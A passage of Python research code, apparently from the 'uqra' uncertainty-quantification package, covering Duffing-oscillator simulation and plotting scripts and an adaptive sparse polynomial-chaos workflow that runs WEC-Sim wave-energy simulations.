dist_x = cp.Lognormal(0,0.5) # normal mean = 0, normal std=0.25
# dist_x = [cp.Uniform(-1,1),cp.Uniform(-1,1)]cp.Uniform(-1,1)
print(dist_x.inv(pf))
print(dist_x.inv(1-pf))
## Define solver system properties
sys_params = np.array([0,0,0.02,1,0.15]).reshape(5,1) #x0,v0, zeta, omega_n, mu
# ------------------------------------------------------------------- ###
# Define simulation parameters ###
# ------------------------------------------------------------------- ###
## Parameters to generate solver system input signal
source_kwargs= {'name': 'T1', 'method':'ifft', 'sides':'double'}
source_func = gen_gauss_time_series
sys_source = [source_func, source_kwargs]
## Parameters to design of experiments
# doe_method, doe_rule, doe_order = 'GQ','lag',[9]*10
sample_points_x = dist_zeta.inv(dist_x.cdf(np.arange(1,25)))
doe_method, doe_rule, doe_order = 'FIX',sample_points_x , [len(sample_points_x )]*10
# doe_method, doe_rule, doe_order = 'MC','R', [20]
doe_params = [doe_method, doe_rule, doe_order]
print(len(doe_params))
## Parameters to the time indexing
time_start, time_ramp, time_max, dt = 0,0,200,0.1
time_params = [time_start, time_ramp, time_max, dt]
## parameters to post analysis
out_responses = [0,]
stats = [1,1,1,1,1,1,0] # [mean, std, skewness, kurtosis, absmax, absmin, up_crossing, moving_avg, moving_std]
post_params = [out_responses, stats]
normalize = True
quad_simparam = simParameter(dist_zeta, doe_params = doe_params, \
time_params = time_params, post_params = post_params,\
sys_params = sys_params, sys_source = sys_source, normalize=normalize)
quad_simparam.set_seed([1,100])
## Get DOE samples
doe_samples_zeta, doe_samples_phy = quad_simparam.get_doe_samples(retphy=True,dist_phy=dist_x)
print(doe_samples_zeta)
print(doe_samples_phy)
## Run simulation
# ### ------------------------------------------------------------------- ###
# ### Run Simulations for training data ###
# ### ------------------------------------------------------------------- ###
# print(doe_samples_phy[0][0][0,1])
training_set_x = doe_samples_phy
training_set_y = run_sim(duffing_oscillator, quad_simparam)
training_set = [training_set_x, training_set_y]
# ## save training x
# _training_set_x = training_set_x[0]
# for i in np.arange(1,len(doe_order)):
# _training_set_x=np.hstack((_training_set_x,training_set_x[i]))
# np.savetxt('training_set_x.csv', np.array(_training_set_x).T, delimiter=',')
# ## save training y
# icount = 0
# for itraining_set_y in training_set_y:
# for i in np.arange(itraining_set_y.shape[0]):
# for j in np.arange(itraining_set_y.shape[1]):
# np.savetxt('training_set_y_{:d}.csv'.format(icount), np.squeeze(itraining_set_y[i,j,:,:]),delimiter=',')
# icount+=1
# _training_set_x=[]
for idoeset in np.arange(len(doe_order)):
itraining_set_x = training_set_x[idoeset]
itraining_set_y = training_set_y[idoeset]
np.save('Fixx_{:d}'.format(idoeset), np.array(training_set_x[idoeset]))
np.save('Fixy_{:d}'.format(idoeset), np.array(training_set_y[idoeset]))
# print(training_set_x[0].shape)
# print(training_set_x[1].shape)
# print(training_set_y[0].shape)
# print(training_set_y[1].shape)
# y = np.squeeze(training_set_y[0][0,0,:,:])
# t = np.squeeze(training_set_y[0][0,0,:,0])
# y_std = []
# for i in range(1,len(y)):
# y_std.append(np.std(y[:i]))
# plt.figure()
# plt.plot(t[1:],np.array(y_std))
# plt.plot(t,y)
# plt.show()
# x0,v0, zeta, omega_n, mu = sys_params
# x0,v0, zeta, omega_n, mu = x0[0],v0[0], zeta[0], omega_n[0], mu[0]
# delta = 2 * zeta * omega_n
# alpha = omega_n**2
# beta = omega_n**2 * mu
# print('delta: {:.2f}, alpha: {:.2f}, beta: {:.2f}'.format(delta, alpha, beta))
# psolver.duffing_equation(x0,v0,delta, alpha, beta,y)
# print(np.array(training_set_y).shape)
# f_obsY = []
# for idoe_samples_phy in doe_samples_phy:
# # training_set_y = run_sim(lin_oscillator, idoe_samples_phy, quad_simparam,\
# # sys_params=sys_params, psd_params=psd_params)
# training_set_y = run_sim(duffing_oscillator, idoe_samples_phy, quad_simparam,\
# sys_params=sys_params, psd_params=psd_params)
# # training_set_y = run_sim(poly5, idoe_samples_phy, quad_simparam)
# f_obsY.append(training_set_y)
# print(np.array(f_obsY).shape)
# f_obsY_max = np.max(f_obsY, axis=-2)
# print(f_obsY_max)
# plt.figure()
# plt.plot(training_set_y[0,:,0], training_set_y[0,:,1])
# plt.show()
#### ------------------------------------------------------------------- ###
#### Define meta model parameters ###
#### ------------------------------------------------------------------- ###
# fit_method = 'SP' # SP: spectral projection, RG: regression
# quad_metamodel = metaModel('PCE', [5], fit_method, dist_zeta)
# ### ------------------------------------------------------------------- ###
# ### Define environmental conditions ###
# ### ------------------------------------------------------------------- ###
# siteEnvi = environment(quad_simparam.site)
# ### ------------------------------------------------------------------- ###
# ### Fitting meta model ###
# ### ------------------------------------------------------------------- ###
# for a in f_obsX:
# print(a.shape)
# for a in f_obsY:
# print(a.shape)
# # for a in f_obsYstats:
# # print(a.shape)
# # istats, iqoi = 5, 0 # absmax
# datax = [x[:len(dist_zeta),:] for x in f_obsX]
# datay = f_obsY #[y[:,istats, iqoi] for y in f_obsY]
# # dataw = [x[len(dist_zeta),:] for x in f_obsX]
# quad_metamodel.fit_model(datax, datay)
# print(quad_metamodel.f_hats[0][0])
# # print(quad_metamodel.f_hats)
# ## ------------------------------------------------------------------- ###
# ## Cross Validation ###
# ## ------------------------------------------------------------------- ###
# quad_metamodel.cross_validate(validatax, validatay)
# print (' Fitting Error:', quad_metamodel.fit_l2error)
# print (' Cross Validation Error:', quad_metamodel.cv_l2errors)
# ### ------------------------------------------------------------------- ###
# ### Prediction ###
# ### ------------------------------------------------------------------- ###
# models_chosen = [[0,1],[1,0]]
# meta_pred = quad_metamodel.predict(1E2,R=10)
# metamodel1 = quad_metamodel.f_hats[0][0]
# datay1 = metamodel1(*datax[0])
# print(datay[0].shape)
# print(datay1.shape)
# n_bins = 100
# fig, ax = plt.subplots(figsize=(8, 4))
# # plot the cumulative histogram
# n, bins, patches = ax.hist(datay[0], n_bins, normed=1, histtype='step',
# cumulative=True, label='True value')
# ax.hist(datay1.T, n_bins, normed=1, histtype='step',cumulative=True, label='Fitted value' )
# # tidy up the figure
# ax.grid(True)
# ax.legend(loc='right')
# ax.set_title('Cumulative step histograms')
# ax.set_xlabel('Annual rainfall (mm)')
# ax.set_ylabel('Likelihood of occurrence')
# plt.show()
if __name__ == '__main__':
main()
```
#### File: examples/duffing/plot_duffing.py
```python
import context
import numpy as np
from uqra.environment import environment
from uqra.metaModel import metaModel
from uqra.simParameters import simParameters
from uqra.run_sim import run_sim
from uqra.solver.dynamic_models import lin_oscillator
from uqra.solver.dynamic_models import duffing_equation
from uqra.solver.dynamic_models import duffing_oscillator
from uqra.solver.benchmark import ishigami
from uqra.solver.benchmark import bench1
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sbs
# The potential and its first derivative, as callables.
# V = lambda x: 0.5 * x**2 * (0.5 * x**2 - 1)
# dVdx = lambda x: x**3 - x
# # The potential energy function on a grid of x-points.
# xgrid = np.linspace(-1.5, 1.5, 100)
# Vgrid = V(xgrid)
# plt.plot(xgrid, Vgrid)
# plt.xlabel('$x$')
# plt.ylabel('$V(x)$')
# Set up the motion for a oscillator with initial position
# x0 and initially at rest.
x0, v0 = 0, 0
tmax, t_trans = 180, 30
omega = 1.4
gamma, delta = 0.39, 0.1
dt_per_period = 100
alpha, beta = 1, 1
# Solve the equation of motion.
source_func =lambda t, kwargs=None: gamma*np.cos(omega*t)
t, X, dt, pstep = duffing_equation(tmax, dt_per_period, x0, v0, gamma, delta, omega, t_trans=t_trans, alpha=alpha, beta = beta)
x, xdot = X.T
dt = 2*np.pi/omega/dt_per_period
omega0 = np.sqrt(alpha)
mu = beta/alpha
zeta = delta/(2*omega0)
t1, X1, dt1, pstep1 = duffing_oscillator(tmax, dt, x0, v0, zeta,omega0,mu, t_trans=t_trans,source_func=source_func)
x1, xdot1 = X1.T
# # The animation
fig, ax = plt.subplots(nrows=2,ncols=2)
# ax1 = ax[0,0]
# ax1.plot(xgrid, Vgrid)
# ax1.set_ylim(-0.3, 0.15)
# ln1, = ax1.plot([], [], 'mo')
# ax1.set_xlabel(r'$x / \mathrm{m}$')
# ax1.set_ylabel(r'$V(x) / \mathrm{J}$')
# Position as a function of time
ax2 = ax[1,0]
ax2.set_xlabel(r'$t / \mathrm{s}$')
ax2.set_ylabel(r'$x / \mathrm{m}$')
# ln2, = ax2.plot(t[:100], x[:100])
ln2, = ax2.plot(t, x)
ln2, = ax2.plot(t1, x1)
ax2.set_ylim(np.min(x), np.max(x))
# Phase space plot
ax3 = ax[1,1]
ax3.set_xlabel(r'$x / \mathrm{m}$')
ax3.set_ylabel(r'$\dot{x} / \mathrm{m\,s^{-1}}$')
ln3, = ax3.plot([], [])
ax3.set_xlim(np.min(x), np.max(x))
ax3.set_ylim(np.min(xdot), np.max(xdot))
# Poincaré section plot
ax4 = ax[0,1]
ax4.set_xlabel(r'$x / \mathrm{m}$')
ax4.set_ylabel(r'$\dot{x} / \mathrm{m\,s^{-1}}$')
ax4.scatter(x[::pstep], xdot[::pstep], s=2, lw=0, c=sbs.color_palette()[0])
scat1 = ax4.scatter([x0], [v0], lw=0, c='m')
plt.tight_layout()
plt.show()
# def animate(i):
# """Update the image for iteration i of the Matplotlib animation."""
# ln1.set_data(x[i], V(x[i]))
# ln2.set_data(t[:i+1], x[:i+1])
# ax2.set_xlim(t_trans, t[i])
# ln3.set_data(x[:i+1], xdot[:i+1])
# if not i % pstep:
# scat1.set_offsets(X[i])
# return
# anim = animation.FuncAnimation(fig, animate, frames=len(x), interval=1)
# Writer = animation.writers['ffmpeg']
# writer = Writer(fps=15, metadata=dict(artist='Me'), bitrate=1800)
# anim.save('duffing.mp4', writer=writer)
```
#### File: examples/RM3/RM3_AdapSPCE_SingleQoI.py
```python
import uqra
import numpy as np, os, sys, io
import scipy.stats as stats
from tqdm import tqdm
import itertools, copy, math, collections
import multiprocessing as mp
import random
import scipy
import matlab.engine
# warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
sys.stdout = uqra.utilities.classes.Logger()
def overfitting_check(cv_err):
"""
if cv error increase twice in a row, then defined as overfit
return True if overfit, otherwise False
"""
if len(cv_err) < 3 :
return False, np.nan
elif cv_err[-1] > cv_err[-2] and cv_err[-2] > cv_err[0]:
return True, cv_err[-3:]
else:
return False, np.nan
def threshold_converge(y, threshold=0.9):
y = np.array(y)
if len(y) == 0:
return False, np.nan
else:
status = True if y[-1]> threshold else False
return status, y[-1]
def relative_converge(y, err=0.05):
"""
check if y is converge in relative error
return: (status, error)
status: Boolean for convergeing or not
error: absolute error
"""
y = np.array(y)
if len(y) < 2:
res = (False, np.nan)
else:
error = abs((y[-2]-y[-1])/ y[-1])
res = (error < err, error)
return res
def absolute_converge(y, err=1e-4):
"""
check if y is converge in absolute error
return: (status, error)
status: Boolean for convergeing or not
error: absolute error
"""
y = np.array(y)
if len(y) < 2:
res = (False, np.nan)
else:
error = abs(y[-2]-y[-1])
res = (error < err, error)
return res
def main(model_params, doe_params, solver, r=0, random_state=None, theta=None):
random.seed(random_state)
## ------------------------ Initialize parameters ----------------- ###
ndim = model_params.ndim
ndim_deg_cases = np.array(list(itertools.product([model_params.ndim,], model_params.degs)))
### data object containing results from intermedia steps
## attribute ending with '_' is a collection of variables after each iteration
data_init = uqra.Data()
data_init.ndim = ndim
data_init.y0_hat_ = []
data_init.cv_err_ = []
data_init.model_ = []
data_init.score_ = []
data_init.DoI_xi_ = []
data_init.DoI_x_ = []
data_init.data_train_ = []
data_init.exploration0 = None## initial exploration sample set
data_init.exploration_ = [] ## exploration sample sets added later
data_init.exploitation_= [] ## exploitation sample sets added later
data_init.deg_converge = False
data_init.deg_overfit = False
data_init.iteration_converge = False
## ------------------------ list of Data obj for all QoIs ----------------- ###
## data object while building p-order PCE iteratively
## attribute ending with '_' is a collection of variables after each iteration
data_QoIs = [copy.deepcopy(data_init) for _ in range(34)]
## nested list, [data_ideg_QoIs[data_iqoi_ideg]] 34 outputs in total
data_degs_QoIs = [copy.deepcopy(data_QoIs) for _ in range(model_params.degs[-1])]
for iqoi in model_params.channel:
random.seed(random_state)
deg = model_params.degs[0]
max_sparsity = 6 ## initialize n_samples
### object contain all training samples
data_train = uqra.Data()
data_train.xi_index = []
data_train.xi = np.empty((model_params.ndim, 0))
data_train.x = np.empty((model_params.ndim, 0))
data_train.y = np.empty((0,34))
while deg < model_params.degs[-1]:
print('\n==================================================================================')
print(' <<<< UQRA Sparse PCE Model: ndim={:d}, p={:d} >>>>'.format(ndim, deg))
print(' < QoI: {:s} >'.format(headers[iqoi]))
print('==================================================================================\n')
data_ideg_QoIs = data_degs_QoIs[deg] ## list of uqra.Data()
data_ideg_QoIs[iqoi].deg = deg
## data_ideg_QoIs was assigned before: overfitting occurs for some QoIs
## new resutls will be appended to current results for order p = deg
## However, for higher order models, results will be cleared
if data_ideg_QoIs[iqoi].deg_overfit:
## clear results for all higher order
for ideg in range(deg+1, model_params.degs[-1]):
## data_degs_QoIs[ideg] either empty list (not reach this order yet) or list of 34 uqra.Data()
data_degs_QoIs[ideg][iqoi] = data_init
## ------------------------ Updating DoE parameters ----------------- ###
idoe_params = copy.deepcopy(doe_params)
idoe_params.ndim = ndim
idoe_params.deg = int(deg)
### Specify candidate data filename template function
idoe_params.update_filenames(filename_template=None)
filename_cand = idoe_params.fname_cand(r)
# filename_design = idoe_params.fname_design(r)
print(' - {:<23s} : {}'.format(' Candidate filename' , filename_cand ))
if filename_cand:
data_cand = np.load(os.path.join(data_dir_cand, filename_cand))
data_cand = data_cand[:ndim,random.sample(range(data_cand.shape[1]), k=idoe_params.num_cand)]
data_cand = data_cand * deg ** 0.5 if doe_params.doe_sampling.upper() in ['CLS4', 'CLS5'] else data_cand
print(' {:<23s} : {}'.format(' shape', data_cand.shape))
else:
data_cand = None
print(' {:<23s} : {}'.format(' shape', data_cand))
print(' - {:<23s} : {}'.format(' UQRA DoE ' ,idoe_params.doe_nickname()))
## ------------------------ UQRA Surrogate model----------------- ###
orth_poly = uqra.poly.orthogonal(ndim, deg, model_params.basis)
dist_xi = orth_poly.weight
### ------------------------ #1: Obtain exploration optimal samples ----------------- ###
print(' ------------------------------------------------------------')
print(' Initial exploration optimal samples in global domain based on FULL basis: {:s}'.format(idoe_params.doe_nickname()))
print(' ------------------------------------------------------------')
print(' > Adding exploration samples in global domain... ')
### optimal samples are available in global_data. Optimal Designs are still process here to confirm those samples are correct
# samples from optimal design
n_samples = max(max_sparsity, math.ceil(0.8*orth_poly.num_basis))
xi_exploration0, idx_optimal = idoe_params.get_samples(data_cand, orth_poly, n_samples, x0=[],
active_index=None, initialization='RRQR', return_index=True)
print(' - {:<32s} : {:d}'.format('Adding exploration optimal samples', n_samples))
### some samples are cached for quick access.
x_exploration0 = solver.map_domain(xi_exploration0, dist_xi)
ii = np.where(np.array([iglobal_data.deg for iglobal_data in global_data]) == deg)[0][0]
iglobal_data = global_data[ii]
# if samples are evaluated before, use those directly
if np.amax(abs(xi_exploration0-iglobal_data.xi_train[:,:n_samples])) > 1e-6 \
or np.amax(abs(x_exploration0-iglobal_data.x_train[:,:n_samples])) > 1e-6 :
print(' - x/xi values in cached data not match, running WEC-Sim ...')
print(xi_exploration0)
print(iglobal_data.xi_train[:,:n_samples])
eng.workspace['deg'] = float(deg)
eng.workspace['phaseSeed'] = float(theta)
y_exploration0 = []
for iHs, iTp in tqdm(x_exploration0.T, ncols=80, desc=' - [WEC-SIM]' ):
eng.workspace['Hs'] = float(iHs)
eng.workspace['Tp'] = float(iTp)
# eng.wecSim(nargout=0)
eng.wecSim(nargout=0,stdout=out,stderr=err)
y_exploration0.append(np.squeeze(eng.workspace['maxima'])[2:]) ## first two are Hs,Tp
y_exploration0 = np.array(y_exploration0)
else:
print(' - Retrieving cached data n={:d}...'.format(n_samples))
y_exploration0 = iglobal_data.y_train[:n_samples,:,theta] ## shape (nsample, nQoIs, n_short_term)
data_exploration0 = uqra.Data()
data_exploration0.xi= xi_exploration0
data_exploration0.x = x_exploration0
data_exploration0.y = y_exploration0
data_train.xi = np.concatenate([data_train.xi, xi_exploration0], axis=1)
data_train.x = np.concatenate([data_train.x , x_exploration0 ], axis=1)
data_train.y = np.concatenate([data_train.y , y_exploration0 ], axis=0)
data_train.xi_index = uqra.list_union(data_train.xi_index, idx_optimal)
data_ideg_QoIs[iqoi].exploration0= data_exploration0
data_ideg_QoIs[iqoi].data_train_.append(copy.deepcopy(data_train))
print(' ------------------------------------------------------------')
print(' Build PCE (p={:d}) model with {} '.format(deg, model_params.fitting))
if np.amax(abs(data_train.x-solver.map_domain(data_train.xi, dist_xi))) > 1e-6:
print(data_train.x[:,:3])
print(solver.map_domain(data_train.xi, dist_xi)[:,:3])
raise ValueError
weight = idoe_params.sampling_weight() ## weight function
data_train= data_ideg_QoIs[iqoi].data_train_[-1]
pce_model = uqra.PCE(orth_poly)
dist_u = model_params.dist_u
dist_xi = orth_poly.weight
dist_x = solver.distributions
pce_model.info()
print(' - {:<32s} : ({},{}), Alpha: {:.2f}'.format('X train', data_train.x.shape[1],
pce_model.num_basis, data_train.x.shape[1]/pce_model.num_basis))
print(' - {:<32s} : {}'.format('Y train' , data_train.y[:,iqoi].shape))
print(' - {:<32s} : {}'.format('Y test ' , xi_test.shape))
pce_model.fit(model_params.fitting, data_train.xi, data_train.y[:, iqoi]/model_params.y_scales[iqoi],
w=weight,n_jobs=model_params.n_jobs)
data_ideg_QoIs[iqoi].sparsity = len(pce_model.active_index)
y_test_hat = pce_model.predict(xi_test, n_jobs=model_params.n_jobs)
data_ideg_QoIs[iqoi].model_.append(pce_model)
data_ideg_QoIs[iqoi].score_.append(pce_model.score)
data_ideg_QoIs[iqoi].cv_err_.append(pce_model.cv_error)
max_sparsity = max(max_sparsity, data_ideg_QoIs[iqoi].sparsity)
data_excd = uqra.Data()
data_excd.pf = model_params.pf
data_excd.y0_hat = uqra.metrics.mquantiles(y_test_hat, 1-model_params.pf)
data_excd.x0_hat = x_test [:,np.argmin(abs(y_test_hat-data_excd.y0_hat))]
data_excd.xi0_hat= xi_test[:,np.argmin(abs(y_test_hat-data_excd.y0_hat))]
eng.workspace['deg'] = float(deg)
eng.workspace['phaseSeed'] = float(theta)
eng.workspace['Hs'] = float(data_excd.x0_hat[0])
eng.workspace['Tp'] = float(data_excd.x0_hat[1])
eng.wecSim(nargout=0,stdout=out,stderr=err)
y0 = np.squeeze(eng.workspace['maxima'])[2:] ## first two are Hs,Tp
data_excd.y0 = y0[iqoi]/model_params.y_scales[iqoi]
data_ideg_QoIs[iqoi].y0_hat_.append(data_excd)
print(' - {:<32s} : {}'.format('Sparsity', data_ideg_QoIs[iqoi].sparsity))
print(' - {:<32s} : x0={}, y0={:.4e}'.format('Estiamted exceedance value',data_excd.x0_hat, data_excd.y0_hat))
print(' - {:<32s} : y={:.4e}, err={:.2f} %'.format('Response with true system at x0', data_excd.y0,
(data_excd.y0_hat - data_excd.y0)/data_excd.y0 *100))
## don't waste data, save this one sample into training set
data_train.xi = np.concatenate([data_train.xi, data_excd.xi0_hat.reshape(ndim, 1)], axis=1)
data_train.x = np.concatenate([data_train.x , data_excd.x0_hat.reshape(ndim, 1)], axis=1)
data_train.y = np.concatenate([data_train.y , y0.reshape(1,-1)], axis=0)
data_ideg_QoIs[iqoi].data_train_[-1]= copy.deepcopy(data_train)
#############################################################################
#############################################################################
i_iteration = 1
while i_iteration <= 20:
# print(' ------------------------------------------------------------')
print(' Sequential Optimal Design: Iteration # {:d} >'.format(i_iteration))
# print(' ------------------------------------------------------------')
n_samples = min(3, max(3,max_sparsity))
print(' > 1. exploration step (FULL basis)... ')
print(' - {:<32s} : {:d}'.format('Adding exploration optimal samples', n_samples))
####-------------------------------------------------------------------------------- ####
# min(max_sparsity, model_params.alpha *pce_model.num_basis - n_samples_deg, 5)
# n_samples = min(10, max_sparsity) #len(active_index)
xi_exploration, idx_optimal = idoe_params.get_samples(data_cand, orth_poly, n_samples, x0=data_train.xi_index,
active_index=None, initialization='RRQR', return_index=True)
assert xi_exploration.shape[1] == n_samples ## make sure return number of samples required
x_exploration = solver.map_domain(xi_exploration, dist_xi)
eng.workspace['deg'] = float(deg)
eng.workspace['phaseSeed'] = float(theta)
y_exploration = []
for iHs, iTp in tqdm(x_exploration.T, ncols=80, desc=' - [WEC-SIM]' ):
eng.workspace['Hs'] = float(iHs)
eng.workspace['Tp'] = float(iTp)
# eng.wecSim(nargout=0)
eng.wecSim(nargout=0,stdout=out,stderr=err)
y_exploration.append(np.squeeze(eng.workspace['maxima'])[2:]) ## first two are Hs,Tp
y_exploration = np.array(y_exploration)
## save exploration data
data_exploration = uqra.Data()
data_exploration.xi= xi_exploration
data_exploration.x = x_exploration
data_exploration.y = y_exploration
data_ideg_QoIs[iqoi].exploration_.append(data_exploration)
data_train.xi = np.concatenate([data_train.xi, xi_exploration], axis=1)
data_train.x = np.concatenate([data_train.x , x_exploration ], axis=1)
data_train.y = np.concatenate([data_train.y , y_exploration ], axis=0)
data_train.xi_index = uqra.list_union(data_train.xi_index, idx_optimal)
data_ideg_QoIs[iqoi].data_train_.append(copy.deepcopy(data_train))
print(' ------------------------------------------------------------')
print(' Build PCE (p={:d}) model with {} '.format(deg, model_params.fitting))
if np.amax(abs(data_train.x-solver.map_domain(data_train.xi, dist_xi))) > 1e-6:
print(data_train.x[:,:3])
print(solver.map_domain(data_train.xi, dist_xi)[:,:3])
raise ValueError
pce_model = uqra.PCE(orth_poly)
weight = doe_params.sampling_weight() ## weight function
print(' - {:<32s} : ({},{}), Alpha: {:.2f}'.format('X train', data_train.x.shape[1],
pce_model.num_basis, data_train.x.shape[1]/pce_model.num_basis))
print(' - {:<32s} : {}'.format('Y train' , data_train.y[:,iqoi].shape))
print(' - {:<32s} : {}'.format('Y test ' , xi_test.shape))
print(' {:<20s}, prediction samples: {}'.format(headers[iqoi], xi_test.shape))
pce_model.fit(model_params.fitting, data_train.xi, data_train.y[:, iqoi]/model_params.y_scales[iqoi],
w=weight,n_jobs=model_params.n_jobs)
data_ideg_QoIs[iqoi].sparsity = len(pce_model.active_index)
y_test_hat = pce_model.predict(xi_test, n_jobs=model_params.n_jobs)
data_ideg_QoIs[iqoi].model_.append(pce_model)
data_ideg_QoIs[iqoi].score_.append(pce_model.score)
data_ideg_QoIs[iqoi].cv_err_.append(pce_model.cv_error)
max_sparsity = max(max_sparsity, data_ideg_QoIs[iqoi].sparsity)
data_excd = uqra.Data()
data_excd.pf = model_params.pf
data_excd.y0_hat = uqra.metrics.mquantiles(y_test_hat, 1-model_params.pf)
data_excd.x0_hat = x_test [:,np.argmin(abs(y_test_hat-data_excd.y0_hat))]
data_excd.xi0_hat= xi_test[:,np.argmin(abs(y_test_hat-data_excd.y0_hat))]
eng.workspace['deg'] = float(deg)
eng.workspace['phaseSeed'] = float(theta)
eng.workspace['Hs'] = float(data_excd.x0_hat[0])
eng.workspace['Tp'] = float(data_excd.x0_hat[1])
eng.wecSim(nargout=0,stdout=out,stderr=err)
y0 = np.squeeze(eng.workspace['maxima'])[2:] ## first two are Hs,Tp
data_excd.y0 = y0[iqoi]/model_params.y_scales[iqoi]
data_ideg_QoIs[iqoi].y0_hat_.append(data_excd)
print(' - {:<32s} : {}'.format('Sparsity', data_ideg_QoIs[iqoi].sparsity))
print(' - {:<32s} : x0={}, y0={:.4e}'.format('Estiamted exceedance value',data_excd.x0_hat, data_excd.y0_hat))
print(' - {:<32s} : y={:.4e}, err={:.2f} %'.format('Response with true system at x0',data_excd.y0,
(data_excd.y0_hat - data_excd.y0)/data_excd.y0*100))
## don't waste data, save this one sample into training set
data_train.xi = np.concatenate([data_train.xi, data_excd.xi0_hat.reshape(ndim, 1)], axis=1)
data_train.x = np.concatenate([data_train.x , data_excd.x0_hat.reshape(ndim, 1)], axis=1)
data_train.y = np.concatenate([data_train.y , y0.reshape(1,-1)], axis=0)
data_ideg_QoIs[iqoi].data_train_[-1]= copy.deepcopy(data_train)
####-------------------------------------------------------------------------------- ####
print(' > 2. exploitation step (SIGNIFICANT basis)... ')
## obtain DoI candidate samples for each QoI
print(' - {:<32s} : {}'.format('Iteration Converge', data_ideg_QoIs[iqoi].iteration_converge))
## obtain candidate samples for each QoI
# data_cand_DoI_iqoi, idx_data_cand_DoI = idoe_params.samples_nearby(data_ideg_QoIs[iqoi].y0_hat_[-1],
# xi_test, data_ideg_QoIs[iqoi].y_test_hat, data_cand, deg, n0=10, epsilon=0.1, return_index=True)
y0_hat_err = abs(data_ideg_QoIs[iqoi].y0_hat_[-1].y0_hat - data_ideg_QoIs[iqoi].y0_hat_[-1].y0)/data_ideg_QoIs[iqoi].y0_hat_[-1].y0
if y0_hat_err < 0.1:
data_cand_DoI_iqoi = idoe_params.domain_of_interest(data_ideg_QoIs[iqoi].y0_hat_[-1].y0_hat, xi_test,
y_test_hat, n_centroid=5, epsilon=0.1)
else:
data_cand_DoI_iqoi = idoe_params.domain_of_interest(data_ideg_QoIs[iqoi].y0_hat_[-1].y0_hat, xi_test,
y_test_hat, n_centroid=1, epsilon=0.2)
# data_cand_DoI_iqoi = idoe_params.domain_of_interest(data_ideg_QoIs[iqoi].y0_hat_[-1].y0_hat, xi_test,
# data_ideg_QoIs[iqoi].y_test_hat, n_centroid=5, epsilon=0.2)
# data_cand_DoI_iqoi = idoe_params.domain_of_interest(data_ideg_QoIs[iqoi].y0_hat_[-1], xi_test,
# data_ideg_QoIs[iqoi].y_test_hat, n_centroid=20, epsilon=0.1)
data_ideg_QoIs[iqoi].DoI_xi_.append(data_cand_DoI_iqoi)
data_ideg_QoIs[iqoi].DoI_x_.append(solver.map_domain(data_cand_DoI_iqoi, dist_xi ))
print(' - {:<32s} : {} '.format('DoI candidate samples', data_cand_DoI_iqoi.shape ))
## get optimal samples for each QoI
print(' - {:<32s} : {:d}'.format('Adding DoI optimal samples', n_samples ))
xi_exploitation, idx_optimal_DoI = idoe_params.get_samples(data_cand_DoI_iqoi, orth_poly, n_samples, x0=[],
active_index= data_ideg_QoIs[iqoi].model_[-1].active_index, initialization='RRQR', return_index=True)
assert xi_exploitation.shape[1] == n_samples ## make sure return number of samples required
x_exploitation = solver.map_domain(xi_exploitation, dist_xi)
eng.workspace['deg'] = float(deg)
eng.workspace['phaseSeed'] = float(theta)
y_exploitation = []
for iHs, iTp in tqdm(x_exploitation.T, ncols=80, desc=' - [WEC-SIM]' ):
eng.workspace['Hs'] = float(iHs)
eng.workspace['Tp'] = float(iTp)
# eng.wecSim(nargout=0)
eng.wecSim(nargout=0,stdout=out,stderr=err)
y_exploitation.append(np.squeeze(eng.workspace['maxima'])[2:]) ## first two are Hs,Tp
y_exploitation = np.array(y_exploitation)
## save exploitation data
data_exploitation = uqra.Data()
data_exploitation.xi= xi_exploitation
data_exploitation.x = x_exploitation
data_exploitation.y = y_exploitation
data_ideg_QoIs[iqoi].exploitation_.append(data_exploitation)
## save all training samples together
data_train.xi = np.concatenate([data_train.xi, xi_exploitation], axis=1)
data_train.x = np.concatenate([data_train.x , x_exploitation ], axis=1)
data_train.y = np.concatenate([data_train.y , y_exploitation ], axis=0)
data_train.xi_index = uqra.list_union(data_train.xi_index, idx_optimal)
data_ideg_QoIs[iqoi].data_train_.append(copy.deepcopy(data_train))
print(' ------------------------------------------------------------')
print(' Build PCE (p={:d}) model with {} '.format(deg, model_params.fitting))
if np.amax(abs(data_train.x-solver.map_domain(data_train.xi, dist_xi))) > 1e-6:
print(data_train.x[:,:3])
print(solver.map_domain(data_train.xi, dist_xi)[:,:3])
raise ValueError
pce_model = uqra.PCE(orth_poly)
weight = doe_params.sampling_weight() ## weight function
print(' - {:<32s} : ({},{}), Alpha: {:.2f}'.format('X train', data_train.x.shape[1],
pce_model.num_basis, data_train.x.shape[1]/pce_model.num_basis))
print(' - {:<32s} : {}'.format('Y train' , data_train.y[:,iqoi].shape))
print(' - {:<32s} : {}'.format('Y test ' , xi_test.shape))
print(' {:<20s}, prediction samples: {}'.format(headers[iqoi], xi_test.shape))
pce_model.fit(model_params.fitting, data_train.xi, data_train.y[:, iqoi]/model_params.y_scales[iqoi],
w=weight, n_jobs=model_params.n_jobs)
data_ideg_QoIs[iqoi].sparsity = len(pce_model.active_index)
y_test_hat = pce_model.predict(xi_test, n_jobs=model_params.n_jobs)
data_ideg_QoIs[iqoi].model_.append(pce_model)
data_ideg_QoIs[iqoi].score_.append(pce_model.score)
data_ideg_QoIs[iqoi].cv_err_.append(pce_model.cv_error)
max_sparsity = max(max_sparsity, data_ideg_QoIs[iqoi].sparsity)
data_excd = uqra.Data()
data_excd.pf = model_params.pf
data_excd.y0_hat = uqra.metrics.mquantiles(y_test_hat, 1-model_params.pf)
data_excd.x0_hat = x_test [:,np.argmin(abs(y_test_hat-data_excd.y0_hat))]
data_excd.xi0_hat= xi_test[:,np.argmin(abs(y_test_hat-data_excd.y0_hat))]
eng.workspace['deg'] = float(deg)
eng.workspace['phaseSeed'] = float(theta)
eng.workspace['Hs'] = float(data_excd.x0_hat[0])
eng.workspace['Tp'] = float(data_excd.x0_hat[1])
eng.wecSim(nargout=0,stdout=out,stderr=err)
y0 = np.squeeze(eng.workspace['maxima'])[2:] ## first two are Hs,Tp
data_excd.y0 = y0[iqoi]/model_params.y_scales[iqoi]
data_ideg_QoIs[iqoi].y0_hat_.append(data_excd)
print(' - {:<32s} : {}'.format('Sparsity', data_ideg_QoIs[iqoi].sparsity))
print(' - {:<32s} : x0={}, y0={:.4e}'.format('Estiamted exceedance value',data_excd.x0_hat, data_excd.y0_hat))
print(' - {:<32s} : y={:.4e}, err={:.2f} %'.format('Response with true system at x0',data_excd.y0,
(data_excd.y0_hat - data_excd.y0)/data_excd.y0*100))
## don't waste data, save this one sample into training set
